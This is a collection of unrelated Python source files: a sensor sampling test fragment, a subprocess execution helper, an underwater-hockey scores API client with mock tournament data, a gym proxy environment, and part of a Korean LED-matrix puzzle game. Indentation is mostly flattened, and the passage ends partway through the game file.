self.assertEqual(self.calls, [(self.sensor, (self.ioloop_time, status, value))])
t_last_sent = self.ioloop_time
self.calls = []
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.NOMINAL
value = value + 1
yield self._thread_update_check(self.ioloop_time, status, value)
yield self._check_cancel(DUT)
self.calls = []
        # Since the strategy is cancelled, no further updates should be sent
yield self.set_ioloop_time(self.ioloop_time + 5*longest)
self.sensor.set(self.ioloop_time, Sensor.WARN, value + 3)
self.assertEqual(len(self.calls), 0)
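# Illustrative usage (a sketch, not part of the test suite): constructing a
# strategy outside the tests. 'my_inform' stands in for any callable taking
# (sensor, reading), mirroring the inform() callback defined in setUp() above.
#
#     sensor = Sensor(Sensor.INTEGER, "an.int", "An integer.", "count", [-40, 30])
#     strategy = sampling.SampleStrategy.get_strategy("period", my_inform, sensor, "10")
#     strategy.start()     # begins sampling on the tornado ioloop
#     ...
#     strategy.cancel()    # detaches from the sensor and stops the strategy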
|
exec_utils.py
|
#! /usr/bin/env python
# Standard Imports
import select
import subprocess
import time
import tempfile
import pickle
import itertools
import multiprocessing
from datetime import datetime
from collections import OrderedDict
from threading import Thread
from queue import Queue, Empty
# Lib Imports
from .file_utils import write_file, read_file, get_tmp_dir
from .log_utils import get_log_func, log_datetime_format
from .string_utils import get_datestring
# kitir Imports
from kitir import *
# logging
log = logging.getLogger('kitir.utils.exec')
# kwargs for subprocess (used by iexec)
SUBPROCESS_KWARGS = ['bufsize', 'executable', 'stdin', 'stdout', 'stderr',
'preexec_fn', 'close_fds', 'shell', 'cwd', 'env',
'universal_newlines', 'startupinfo', 'creationflags']
class MultiProcess:
# todo: move to own util / document
counter = itertools.count()
def __init__(self, name, func, args, kwargs):
self.name = name
self.func = func
self.args = args
self.kwargs = kwargs
self.proc = None
def wait_read_result(self):
self.join()
if not self.kwargs.get('pickle_result', False):
return self.exitcode
with open(self.kwargs['pickle_result'], 'rb') as f:
return pickle.load(f)
def go(self):
self.start()
self.join()
return self.exitcode
def start(self):
self.proc = multiprocessing.Process(target=self.func, name=self.name, args=self.args, kwargs=self.kwargs)
self.proc.start()
def join(self, timeout=None):
self.proc.join(timeout)
def is_alive(self):
return self.proc.is_alive()
def kill(self):
self.proc.terminate()
def get_pid(self):
return self.proc.ident
def send_signal(self, signal):
if self.get_pid():
return os.kill(self.get_pid(), signal)
@property
def exitcode(self):
return self.proc.exitcode
class ExecResult:
"""Result of an execution. Has STDOUT and STDERR and RC."""
def __init__(self, out=None, err=None, rc=0, time_taken=None, cmd=None, ordered_out=None, start=None, timeout=0,
subprocess_kwargs=None):
self.out = out or []
self.err = err or []
self.rc = rc
self.__out = ''
self.__err = ''
self.time = time_taken
self.start = start
        self.start_datetime = datetime.fromtimestamp(start).strftime(log_datetime_format) if start else None
self.timeout = timeout
self.cmd = cmd
self.ordered_out = ordered_out
self.subprocess_kwargs = subprocess_kwargs or {}
def contents(self):
"""Returns all the content of the execution as a string, ordered if possible, else stdout first then stderr"""
if self.ordered_out:
return ''.join(self.ordered_out)
return '\n'.join([self.out_string, self.err_string])
def list_contents(self):
"""Returns all the content of the execution as a list, ordered if possible, else stdout first then stderr"""
if self.ordered_out:
return self.ordered_out
return self.out + self.err
def out_contains(self, content):
"""Check if stdout contains the content
:param content:
"""
return self._contains(content, self.out_string)
def err_contains(self, content):
"""Check if stderr contains the content
:param content:
"""
return self._contains(content, self.err_string)
def contains(self, content, collection_func=all):
"""Check if either stdout or stderr contains the content
:param content: string or collection of strings
:param collection_func: specify any or all func
"""
if isinstance(content, str):
return bool(self.out_contains(content) or self.err_contains(content))
else:
return collection_func(self.contains(c, collection_func) for c in content)
@staticmethod
def _contains(content, collection):
"""helper"""
if isinstance(content, str):
return bool(content in collection)
elif isinstance(content, list):
return all(c in collection for c in content)
else:
raise ValueError('Unsupported type: type={}'.format(type(content)))
def debug_output(self, dump_kwargs=False):
"""returns a debug output string that is ready for printing or writing"""
return self.get_dump_data(dump_kwargs)
def get_dump_header(self, as_str=True):
"""Formats all headers for dumping; cmd, rc, start, time"""
headers = ['cmd', 'rc', 'start', 'start_datetime', 'time']
if as_str:
head = '\n'.join(['{}: {}'.format(h, getattr(self, h)) for h in headers])
else:
head = OrderedDict((h, getattr(self, h)) for h in headers)
return head
def get_subprocess_kwargs_dump(self):
"""gets the subprocess kwargs that were passed to the iexec, if any"""
if self.subprocess_kwargs:
kwargs_dump = '<subprocess kwargs>\n{}'.format(
'\n'.join(['{}: {}'.format(k, v) for k, v in sorted(self.subprocess_kwargs.items())]))
else:
kwargs_dump = '<no subprocess kwargs>'
return kwargs_dump
def to_dump_file(self, dump_file, dump_file_rotate=False, dump_kwargs=False):
"""Dump to dump file, handles all writing and rotating"""
return write_file(dump_file, contents=self.get_dump_data(dump_kwargs), rotate=dump_file_rotate)
def get_dump_data(self, dump_kwargs, as_str=True):
"""convenience method ot get the dump data"""
contents = OrderedDict()
contents['head'] = self.get_dump_header(as_str)
if dump_kwargs:
contents['kwargs'] = self.get_subprocess_kwargs_dump() if as_str else self.subprocess_kwargs.copy()
contents['data'] = self.contents() if as_str else {'out': self.out, 'err': self.err}
if as_str:
return '\n\n'.join(contents.values())
return contents
def append_output(self, log_id=None):
"""returns a string representation of the object with extra newlines to be appended to for logging
:param log_id:
"""
if log_id is not None:
return '{}: {}\n\n'.format(log_id, self.__str__())
return '{}\n\n'.format(self.__str__())
@property
def out_string(self):
if not self.__out:
self.__out = ''.join(self.out)
return self.__out
@property
def err_string(self):
if not self.__err:
self.__err = ''.join(self.err)
return self.__err
@property
def bad_rc(self):
return self.rc != 0
@property
def good_rc(self):
return not self.bad_rc
@property
def bad(self):
return self.bad_rc or self.err_string
@property
def good(self):
return not self.bad
def __repr__(self):
return 'ExecResult(cmd={} out={} err={} rc={} start={} time={} timeout={} kwargs={})'.format(
self.cmd, self.out, self.err, self.rc, self.start, self.time, self.timeout, self.subprocess_kwargs)
def __str__(self):
return str(self.__repr__())
def detached_iexec(cmd, **kwargs):
"""
Multiprocess iexec, perform a command on local machine with a separate process.
Immediately finishes, and you now hold a multi-process object that you can query and use to wait
once complete you can access the ExecResult Object
:param cmd: the command
:param kwargs: any kwargs
:return: MultiProcess Object to query until you get an ExecResult Object
"""
entity = 'mpiexec.{}'.format(next(MultiProcess.counter))
if kwargs.get('pickle_result', False):
pickle_file = os.path.join(get_tmp_dir(use_logging=False), entity)
kwargs['pickle_result'] = pickle_file
mp = MultiProcess(entity, iexec, [cmd], kwargs)
mp.start()
return mp
def mpiexec(cmd, **kwargs):
"""
Multiprocess iexec, perform a command on local machine with a separate process.
:param cmd: the command
:param kwargs: any kwargs
:return: ExecResult Object
"""
entity = 'mpiexec.{}'.format(next(MultiProcess.counter))
pickle_file = os.path.join(get_tmp_dir(use_logging=False), entity)
kwargs['pickle_result'] = pickle_file
mp = MultiProcess(entity, iexec, [cmd], kwargs)
mp.go()
with open(pickle_file, 'rb') as f:
return pickle.load(f)
def iexec(cmd, **kwargs):
"""
Perform a command on local machine with subprocess.Popen
contains many conveniences and logging capabilities
returns an ExecResult object which also contains many conveniences
:param cmd: the command
:param kwargs: any kwargs
:return: ExecResult Object
"""
show_log = kwargs.pop('show_log', True)
to_console = kwargs.pop('to_console', True)
print_to_console = kwargs.pop('print_to_console', False)
redirect_output = kwargs.pop('redirect_output', False)
redirect_file_name = kwargs.pop('redirect_file_name', None)
log_as_debug = kwargs.pop('log_as_debug', False)
log_as_trace = kwargs.pop('log_as_trace', False)
log_as_level = kwargs.pop('log_as_level', None)
pickle_result = kwargs.pop('pickle_result', '')
dump_file = kwargs.pop('dump_file', None)
trace_file = kwargs.pop('trace_file', None)
timeout = kwargs.pop('timeout', 0)
dump_file_rotate = kwargs.pop('dump_file_rotate', False)
alt_out = kwargs.pop('alt_out', None)
alt_err = kwargs.pop('alt_err', alt_out)
iexec_communicate = kwargs.pop('iexec_communicate', None)
iexec_communicate_input = kwargs.pop('iexec_communicate_input', None)
dump_kwargs = kwargs.pop('dump_kwargs', False)
text_mode = kwargs.pop('text_mode', True)
if not isinstance(cmd, str):
cmd = subprocess.list2cmdline(cmd)
if redirect_output and running_on_windows:
if redirect_file_name is None:
redirect_file = tempfile.NamedTemporaryFile(
suffix=".txt",
prefix="gstmp.{}.redirect.".format(get_datestring()),
dir=ir_artifact_dir,
delete=False
)
            # close the file: we only need its name, and it must be closed before it can be used to redirect the output
redirect_file.close()
redirect_file_name = redirect_file.name
cmd += ' > {} 2>&1'.format(redirect_file_name)
if print_to_console:
print(cmd)
if show_log:
msg = 'exec: {}'.format(cmd)
if log_as_level:
get_log_func(log_as_level)(msg)
elif log_as_trace:
log.trace(msg)
elif log_as_debug:
log.debug(msg)
else:
log.info(msg)
pkwargs = {'shell': True, 'stdout': subprocess.PIPE, 'stderr': subprocess.PIPE, 'text': text_mode}
subprocess_kwargs = {}
for arg in SUBPROCESS_KWARGS:
if arg in kwargs and arg not in pkwargs:
pkwargs[arg] = kwargs[arg] # kwargs to actually pass to the subprocess
subprocess_kwargs[arg] = kwargs[arg] # the kwargs the user supplied
stdout = []
stderr = []
ordered_out = []
start_time = time.time()
proc = subprocess.Popen(args=cmd, **pkwargs)
def _write_to_stdout(line):
if to_console:
sys.stdout.write(line)
if print_to_console:
print(line)
if alt_out is not None and callable(alt_out):
alt_out(contents=line)
stdout.append(line)
ordered_out.append(line)
def _write_to_stderr(line):
if to_console:
sys.stderr.write(line)
if print_to_console:
print(line)
if alt_err is not None and callable(alt_err):
alt_err(contents=line)
stderr.append(line)
ordered_out.append(line)
if running_on_windows:
if iexec_communicate:
stdout_buffer, stderr_buffer = proc.communicate(iexec_communicate_input)
if redirect_output:
stdout_buffer = read_file(redirect_file_name)
for stdout_line in stdout_buffer:
_write_to_stdout(stdout_line)
for stderr_line in stderr_buffer:
_write_to_stderr(stderr_line)
rc = proc.wait()
else:
            def _enqueue_stream(stream, queue):
                # the EOF sentinel must match the stream mode: '' for text streams, b'' for binary
                sentinel = '' if text_mode else b''
                for line in iter(stream.readline, sentinel):
                    queue.put(line)
                stream.close()
qo = Queue()
to = Thread(target=_enqueue_stream, args=(proc.stdout, qo))
to.daemon = True # thread dies with the program
to.start()
qe = Queue()
te = Thread(target=_enqueue_stream, args=(proc.stderr, qe))
te.daemon = True # thread dies with the program
te.start()
while True:
try:
stdout_line = qo.get_nowait() # or q.get(timeout=.1)
except Empty:
pass
else:
_write_to_stdout(stdout_line)
sys.stdout.flush()
try:
stderr_line = qe.get_nowait() # or q.get(timeout=.1)
except Empty:
pass
else:
_write_to_stderr(stderr_line)
sys.stderr.flush()
rc = proc.poll()
if rc is not None:
# finished proc, read all the rest of the lines from the buffer
try:
while True:
stdout_line = qo.get_nowait() # or q.get(timeout=.1)
_write_to_stdout(stdout_line)
sys.stdout.flush()
except Empty:
pass
try:
while True:
stderr_line = qe.get_nowait() # or q.get(timeout=.1)
_write_to_stderr(stderr_line)
sys.stderr.flush()
except Empty:
pass
if redirect_output:
stdout_buffer = read_file(redirect_file_name)
for stdout_line in stdout_buffer:
_write_to_stdout(stdout_line)
break
else:
reads = [proc.stdout.fileno(), proc.stderr.fileno()]
while True:
ret = select.select(reads, [], [])
for fd in ret[0]:
if fd == proc.stdout.fileno():
stdout_line = proc.stdout.readline()
_write_to_stdout(stdout_line)
if fd == proc.stderr.fileno():
stderr_line = proc.stderr.readline()
_write_to_stderr(stderr_line)
rc = proc.poll()
if rc is not None:
# finished proc, read all the rest of the lines from the buffer
stdout_buffer = proc.stdout.readlines()
for stdout_line in stdout_buffer:
_write_to_stdout(stdout_line)
stderr_buffer = proc.stderr.readlines()
for stderr_line in stderr_buffer:
_write_to_stderr(stderr_line)
break
if timeout and time.time() - start_time > timeout:
                raise RuntimeError('Timeout ({}s) executing cmd: {}'.format(timeout, cmd))
time_taken = time.time() - start_time
result = ExecResult(stdout, stderr, rc, time_taken, cmd, ordered_out, start_time, timeout, subprocess_kwargs)
if dump_file:
result.to_dump_file(dump_file, dump_file_rotate, dump_kwargs=dump_kwargs)
if trace_file:
write_file(trace_file, contents=result.append_output(), filemode='a')
if pickle_result:
with open(pickle_result, 'wb') as f:
pickle.dump(result, f, protocol=1)
return result
__all__ = [
'iexec', 'mpiexec', 'detached_iexec', 'ExecResult'
]
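# Illustrative usage (a sketch, not part of the library): run a trivial shell
# command through iexec and inspect the captured ExecResult. Assumes a shell
# where 'echo' is available.
if __name__ == '__main__':
    res = iexec('echo hello', show_log=False, to_console=False)
    # rc, stdout and stderr are all captured on the ExecResult
    print('rc={} out={!r} good={}'.format(res.rc, res.out_string, res.good))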
|
uwhscores_comms.py
|
import requests
import threading
from functools import lru_cache
class UWHScores(object):
def __init__(self, base_address='https://uwhscores.com/api/v1/', mock=False):
self._base_address = base_address
self._mock = mock
self._fail_handler = lambda x : print(x)
def login(self, username, password):
self._username = username
self._password = password
def get_tournament_list(self, callback):
def success(reply):
json = reply.json()
return callback(json['tournaments'])
self._async_request('get', self._base_address + 'tournaments',
callback=success)
def get_tournament(self, tid, callback):
if tid is None:
return
def success(reply):
json = reply.json()
return callback(json['tournament'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid),
callback=success)
def get_game_list(self, tid, callback):
if tid is None:
return
def success(reply):
json = reply.json()
return callback(json['games'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/games',
callback=success)
def get_game(self, tid, gid, callback):
if tid is None or gid is None:
return
def success(reply):
json = reply.json()
return callback(json['game'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/games/' + str(gid),
callback=success)
def get_team_list(self, tid, callback):
if tid is None:
return
def success(reply):
json = reply.json()
return callback(json['teams'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/teams',
callback=success)
def get_team(self, tid, team_id, callback):
if tid is None or team_id is None:
return
def success(reply):
json = reply.json()
return callback(json['team'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/teams/' + str(team_id),
callback=success)
def post_score(self, tid, gid, score_b, score_w, black_id, white_id):
def login_success(response):
token = response.json()['token']
score = {
"game_score": {
'tid': tid,
'gid': gid,
'score_w': score_w,
'score_b': score_b,
'black_id': black_id,
'white_id': white_id
}
}
self._async_request('post', self._base_address + 'tournaments/' + str(tid) + '/games/' + str(gid),
json=score, callback=lambda _:None, auth=(token, ''))
self._async_request('get', self._base_address + 'login',
auth=(self._username, self._password),
callback=login_success)
def get_team_flag(self, tid, team_id, callback):
if tid is None or team_id is None:
return
def success(team):
flag_url = team['flag_url']
if not flag_url:
callback(None)
return
@lru_cache(maxsize=16)
def fetch_flag(url):
callback(requests.get(url, stream=True).raw)
fetch_flag(flag_url)
self.get_team(tid, team_id, success)
#def get_standings(self, tid, callback):
# def success(reply):
# json = reply.json()
# return callback(json['standings'])
#
# self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/standings',
# callback=success)
def get_roster(self, tid, team_id, callback):
if tid is None or team_id is None:
return
def success(reply):
json = reply.json()
callback(json['team']['roster'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/teams/' + str(team_id),
callback=success)
def _mock_data(self):
return { 'api' : { 'v1' : {
'tournaments' : {
0 : { 'tid' : 0 },
1 : { 'tid' : 1 },
2 : { 'tid' : 2 },
3 : { 'tid' : 3 },
4 : { 'tid' : 4 },
5 : { 'tid' : 5 },
6 : { 'tid' : 6 },
7 : { 'tid' : 7 },
8 : { 'tid' : 8 },
9 : { 'tid' : 9 },
10 : { 'tid' : 10 },
11 : { 'tid' : 11 },
12 : {
'mock_name' : 'tournament',
'tid' : 12,
'standings' : {
0 : {
'team' : 'Team Sexy',
'team_id' : 2,
'stats' : {
'points' : 27
},
},
2 : {
'team' : 'UF',
},
4 : {
'team' : 'Hampton'
},
6 : {
'team' : 'Swordfish'
},
7 : {
'team' : 'George Mason'
}
}
},
13 : { 'tid' : 13 },
14 : {
'mock_name' : 'tournament',
'tid' : 14,
'name' : 'Battle@Altitude 2018',
'location' : 'Denver, CO',
'is_active' : False,
'games' : {
1 : {
'black' : 'LA',
'black_id' : 1,
'pool' : '1',
},
4 : {
'white' : 'Seattle',
'white_id' : 6,
'start_time' : '2018-01-27T09:02:00',
},
6 : {
'black' : 'U19 Girls',
'black_id' : 14,
'day' : 'Sat',
'start_time' : '2018-01-27T09:34:00',
'white' : 'US Elite Women',
'white_id' : 17,
}
},
'teams' : {
1 : { 'name' : 'LA' },
3 : { 'name' : 'Rainbow Raptors' },
7 : { 'name' : 'Cupcake Crocodiles' },
11 : { 'name' : 'Chicago' },
13 : { 'name' : 'Colorado B' },
17 : { 'name' : 'US Elite Women' },
}
},
15 : {
'mock_name' : 'tournament',
'tid' : 15,
'name' : '2018 Worlds Mockup',
'location' : 'Quebec City, Canada',
'is_active' : True,
'games' : {
1 : {
'mock_name' : 'game',
'black' : 'Argentina',
'black_id' : 1,
'pool' : 1,
'white' : 'Australia',
'white_id' : 2,
'start_time' : '2018-07-18T07:40:00'
},
2 : {
'mock_name' : 'game',
'black' : 'USA',
'black_id' : 3,
'pool' : 2,
'white' : 'Columbia',
'white_id' : 4,
'start_time' : '2018-07-18T07:40:00'
}
},
'teams' : {
1 : {
'mock_name' : 'team',
'name' : 'Argentina Masters Men',
'team_id' : 1,
'roster' : {
1 : {
'player_id' : 1,
'name' : 'Schmoe, Joe',
},
2 : {
'player_id' : 2,
'name' : 'Doe, John'
},
3 : {
'player_id' : 3,
'name' : 'Bobby, Ricky'
},
4 : {
'player_id' : 4,
'name' : 'Georgeson, George'
},
5 : {
'player_id' : 5,
'name' : 'Steveson, Steve'
},
6 : {
'player_id' : 6,
'name' : 'Justinson, Justin'
},
7 : {
'player_id' : 7,
'name' : 'Pauly, Paul'
},
8 : {
'player_id' : 8,
'name' : 'Everett, Earnest'
},
9 : {
'player_id' : 9,
'name' : 'Clumboldt, Cletus'
},
10 : {
'player_id' : 10,
'name' : 'Miller, Milhouse'
},
11 : {
'player_id' : 11,
'name' : 'Thompson, Tucker'
},
12 : {
'player_id' : 12,
'name' : 'Richardson, Rich'
}
}
},
2 : {
'mock_name' : 'team',
'name' : 'Australia Masters Men',
'team_id' : 2,
'roster' : {
1 : {
'player_id' : 1,
'name' : 'Speedwagon, Mario',
},
2 : {
'player_id' : 2,
'name' : 'Romer, Robby'
},
3 : {
'player_id' : 3,
'name' : 'Riker, Randolph'
},
4 : {
'player_id' : 4,
'name' : 'Tomlin, Teddy'
},
5 : {
'player_id' : 5,
'name' : 'Wolf, Warren'
},
6 : {
'player_id' : 6,
'name' : 'Pollard, Phillip'
},
7 : {
'player_id' : 7,
'name' : 'Bavaro, Buster'
},
8 : {
'player_id' : 8,
'name' : 'James, Joshua'
},
9 : {
'player_id' : 9,
'name' : 'Shin, Stewart'
},
10 : {
'player_id' : 10,
'name' : 'Hume, Huey'
},
11 : {
'player_id' : 11,
'name' : 'Vos, Valentine'
},
12 : {
'player_id' : 12,
'name' : 'Newburn, Noel'
}
}
},
3 : { 'name' : 'USA Masters Men', 'team_id' : 3 },
4 : { 'name' : 'Columbia Masters Men', 'team_id' : 4 },
}
}
}
}}}
def _mock_api(self, endpoint, cb_success, cb_fail):
import urllib.parse
import posixpath
def path_parse(path_string):
result = []
tmp = posixpath.normpath(path_string)
while tmp != "/":
(tmp, item) = posixpath.split(tmp)
result.insert(0, item)
return result
url_parsed = urllib.parse.urlparse( endpoint )
path_parsed = path_parse(urllib.parse.unquote(url_parsed.path))
try:
mock = self._mock_data()
for idx, item in enumerate(path_parsed):
try:
item = int(item)
except ValueError:
pass
mock = mock[item]
class Wrap(object):
def __init__(self, wrap):
self._wrap = wrap
def json(self):
return { self._wrap['mock_name'] : self._wrap }
cb_success(Wrap(mock))
except KeyError as e:
print('mock lookup fail for: ' + endpoint)
cb_fail(e)
def set_fail_handler(self, callback):
self._fail_handler = callback
def _async_request(self, method, *args, callback,
callback_fail=None,
timeout=5, **kwargs):
method = {
'get' : requests.get,
'post' : requests.post,
'put' : requests.put,
'patch' : requests.patch,
'delete' : requests.delete,
'options' : requests.options,
'head' : requests.head
}[method.lower()]
callback_fail = callback_fail or self._fail_handler
def wrap_method(*args, **kwargs):
try:
method(*args, **kwargs)
except requests.exceptions.ConnectionError as e:
callback_fail(e)
except Exception as e:
callback_fail(e)
parent_args = args
if callback:
def callback_with_args(response, *args, **kwargs):
try:
callback(response)
except Exception as e:
callback_fail((parent_args[0], e))
kwargs['hooks'] = {'response': callback_with_args}
kwargs['timeout'] = timeout
if self._mock:
self._mock_api(args[0], callback, callback_fail)
else:
thread = threading.Thread(target=wrap_method, args=args, kwargs=kwargs)
thread.start()
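# Illustrative usage (a sketch, not part of the module): exercise the client
# against its built-in mock data, so no network access is required; the
# tid/gid values below refer to entries in _mock_data() above.
if __name__ == '__main__':
    uwh = UWHScores(mock=True)
    uwh.set_fail_handler(lambda err: print('request failed:', err))
    uwh.get_tournament(15, lambda t: print(t['name']))                  # '2018 Worlds Mockup'
    uwh.get_game(15, 1, lambda g: print(g['black'], 'vs', g['white']))  # Argentina vs Australia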
|
env.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This contains the proxy gym environment."""
import sys
import time
from queue import Queue
from threading import Thread
from typing import Any, Tuple, cast
import gym
from aea.configurations.base import PublicId
from aea.helpers.base import locate
from aea.mail.base import Envelope
from aea.protocols.base import Message
sys.modules["packages.fetchai.connections.gym"] = locate(
"packages.fetchai.connections.gym"
)
sys.modules["packages.fetchai.protocols.gym"] = locate("packages.fetchai.protocols.gym")
from packages.fetchai.protocols.gym.message import GymMessage # noqa: E402
from packages.fetchai.protocols.gym.serialization import GymSerializer # noqa: E402
from .agent import ProxyAgent # noqa: E402
Action = Any
Observation = Any
Reward = float
Done = bool
Info = dict
Feedback = Tuple[Observation, Reward, Done, Info]
DEFAULT_GYM = "gym"
class ProxyEnv(gym.Env):
"""This class implements a proxy gym environment."""
def __init__(self, gym_env: gym.Env) -> None:
"""
Instantiate the proxy environment.
:param gym_env: gym environment
:return: None
"""
super().__init__()
self._queue = Queue()
self._action_counter = 0
self._agent = ProxyAgent(
name="proxy", gym_env=gym_env, proxy_env_queue=self._queue
)
self._agent_address = self._agent.identity.address
self._agent_thread = Thread(target=self._agent.start)
def step(self, action: Action) -> Feedback:
"""
Run one time-step of the environment's dynamics.
Mirrors the standard 'step' method of a gym environment.
- The action is given to _encode_action, which does the necessary conversion to an envelope.
- The envelope is given to the outbox of the proxy agent.
- The method blocks until the _queue returns an envelope.
- The envelope is decoded with _decode_percept to a message.
- The message is converted into the standard observation, reward, done and info via _message_to_percept
:param action: the action sent to the step method (e.g. the output of an RL algorithm)
:return: a Tuple containing the Feedback of Observation, Reward, Done and Info
"""
self._action_counter += 1
step_id = self._action_counter
out_envelope = self._encode_action(action, step_id)
# Send the envelope via the proxy agent and to the environment
self._agent.outbox.put(out_envelope)
# Wait (blocking!) for the response envelope from the environment
in_envelope = self._queue.get(block=True, timeout=None) # type: Envelope
msg = self._decode_percept(in_envelope, step_id)
observation, reward, done, info = self._message_to_percept(msg)
return observation, reward, done, info
def render(self, mode="human") -> None:
"""
Render the environment.
:return: None
"""
# TODO: adapt this line to the new APIs. We no longer have a mailbox.
self._agent.mailbox._connection.channel.gym_env.render(mode)
def reset(self) -> None:
"""
Reset the environment.
:return: None
"""
if not self._agent.multiplexer.is_connected:
self._connect()
gym_msg = GymMessage(performative=GymMessage.Performative.RESET)
gym_bytes = GymSerializer().encode(gym_msg)
envelope = Envelope(
to=DEFAULT_GYM,
sender=self._agent_address,
protocol_id=GymMessage.protocol_id,
message=gym_bytes,
)
self._agent.outbox.put(envelope)
def close(self) -> None:
"""
Close the environment.
:return: None
"""
gym_msg = GymMessage(performative=GymMessage.Performative.CLOSE)
gym_bytes = GymSerializer().encode(gym_msg)
envelope = Envelope(
to=DEFAULT_GYM,
sender=self._agent_address,
protocol_id=GymMessage.protocol_id,
message=gym_bytes,
)
self._agent.outbox.put(envelope)
self._disconnect()
def _connect(self):
"""
Connect to this proxy environment. It starts a proxy agent that can interact with the framework.
:return: None
"""
assert not self._agent_thread.is_alive(), "Agent already running."
self._agent_thread.start()
while not self._agent.multiplexer.is_connected:
time.sleep(0.1)
def _disconnect(self):
"""
Disconnect from this proxy environment. It stops the proxy agent and kills its thread.
:return: None
"""
self._agent.stop()
self._agent_thread.join()
self._agent_thread = None
def _encode_action(self, action: Action, step_id: int) -> Envelope:
"""
Encode the 'action' sent to the step function as one or several envelopes.
:param action: the action that is the output of an RL algorithm.
:param step_id: the step id
:return: an envelope
"""
gym_msg = GymMessage(
performative=GymMessage.Performative.ACT, action=action, step_id=step_id
)
gym_bytes = GymSerializer().encode(gym_msg)
envelope = Envelope(
to=DEFAULT_GYM,
sender=self._agent_address,
protocol_id=GymMessage.protocol_id,
message=gym_bytes,
)
return envelope
def _decode_percept(self, envelope: Envelope, expected_step_id: int) -> Message:
"""
Receive the response from the gym environment in the form of an envelope and decode it.
The response is a PERCEPT message containing the usual 'observation', 'reward', 'done', 'info' parameters.
:param expected_step_id: the expected step id
:return: a message received as a response to the action performed in apply_action.
"""
if envelope is not None:
if envelope.protocol_id == PublicId.from_str("fetchai/gym:0.1.0"):
gym_msg = GymSerializer().decode(envelope.message)
gym_msg_performative = GymMessage.Performative(
gym_msg.get("performative")
)
gym_msg_step_id = gym_msg.get("step_id")
if (
gym_msg_performative == GymMessage.Performative.PERCEPT
and gym_msg_step_id == expected_step_id
):
return gym_msg
else:
raise ValueError(
"Unexpected performative or no step_id: {}".format(
gym_msg_performative
)
)
else:
raise ValueError("Unknown protocol_id: {}".format(envelope.protocol_id))
else:
raise ValueError("Missing envelope.")
def _message_to_percept(self, message: Message) -> Feedback:
"""
Transform the message received from the gym environment into observation, reward, done, info.
        :param message: the message received as a response to the action performed in apply_action.
:return: the standard feedback (observation, reward, done, info) of a gym environment.
"""
observation = cast(Any, message.get("observation"))
reward = cast(float, message.get("reward"))
done = cast(bool, message.get("done"))
info = cast(dict, message.get("info"))
return observation, reward, done, info
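# Illustrative usage sketch (an assumption, not part of the original module):
# how a training loop might drive ProxyEnv. The constant action below is a
# placeholder for a policy's output; everything else uses only the methods
# defined above.
#
#   import gym
#   env = ProxyEnv(gym.make("CartPole-v1"))
#   env.reset()                      # connects the proxy agent on first use
#   for _ in range(100):
#       action = 0                   # replace with your policy's output
#       observation, reward, done, info = env.step(action)
#       if done:
#           env.reset()
#   env.close()                      # sends CLOSE and stops the proxy agent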
|
gallery.py
|
from matrix import*
import random
import time
from original import draw_matrix
import LED_display as LMD
import threading
from score import ScoreBlk
from score import Score
def LED_init(): ## Lights up the LED matrix display
    thread=threading.Thread(target=LMD.main, args=())
    thread.daemon=True
    thread.start()
    return
def gallery_mode_exe(): ## Runs the gallery-mode game
    arrayBlk=[[2,2,2,2],[2,2,2,2],[2,2,2,2],[2,2,2,2]] ## Block the player controls
    currBlk=Matrix(arrayBlk) ## Convert to matrix form
    count=0 ## Counts how many of the 5 pictures have been completed
    Q=0 ## Set to 1 to end the game immediately when the player quits midway
    i=0 ## Used to continue or end the game after a success or failure
    score=0 ## Tracks the player's game score
    while True: ## Loop until the game ends
        if Q==1:
            print("You quit the game partway through. Exiting the game.")
            break ## If the player quit (Q is 1), leave the loop and end the game
        if count==5:
            print("You completed gallery mode. Exiting the game.")
            break ## Once all 5 pictures are solved (count is 5), leave the loop and end the game
        if (i==1)or(i==2): ## On success or failure (excluding a mid-game quit), print the scores
score=int(score)
f = open("갤러리1등.txt", 'r')
file = f.read()
f.close()
            lines = file.splitlines() ## Read the stored high score from the 갤러리1등 text file
            for line in lines:
                print("High score record: ", line)
                line=int(line) ## Parse the score as an integer
                draw_matrix(Score(line)) ## Call Score to build a screen showing that score and draw_matrix to render it,
                time.sleep(2) ## showing the previous high score on the LED matrix for 2 seconds
                print(player,"'s record: ",score)
                draw_matrix(Score(score))
                time.sleep(2) ## Show the current player's score for 2 seconds in the same way
                if line<score:
                    print("Congratulations, you set a new record!!")
                    f= open("갤러리1등.txt", 'w')
                    f.write(str(score)) ## If the player beat the record, write the new high score to the 갤러리1등 file
                    print("New high score: ",score) ## Print the record the player just set
                    f.close()
        if i==1: ## Failed, but the player chose to restart
            print("Restarting the game.")
        elif i==2: ## Failed, and the player chose to stop
            print("Exiting the game.")
            break ## Leave the loop and end the game
## output
print("환영합니다. 게임을 시작합니다.") ## 게임 시작
player = input("플레이어의 이름을 입력하세요: ") ## 사용자 이름 입력받음
## 갤러리 속 그림의 종류 수박,아이스크림,딸기,하트,강아지 총 5가지, 각 그림은 조각 조각 나뉘어져 조각 하나씩 문제로 출제됨
gallery = [['a','b','c','d'],['e','f','g','h'],['i','j'],['k','l'],['m','n','o','p','q','r']] ## a,b,c,d같은 요소는 수박 그림을 4등분한 각각의 그림 조각 파일을 의미
random.shuffle(gallery) ## 갤러리 리스트 속 요소들의 순서 무작위로 변경
for picture in gallery: ## 무작위로 변경된 순서대로, 즉 랜덤으로 그림 하나씩 뽑기
count = count+1 ## 뽑힌 그림 하나당 count 값이 1씩증가, count가 5가 되면 모든 그림이 출제된 것임
random.shuffle(picture) ## 뽑힌 그림 리스트 속 그림 조각들의 순서 무작위로 변경
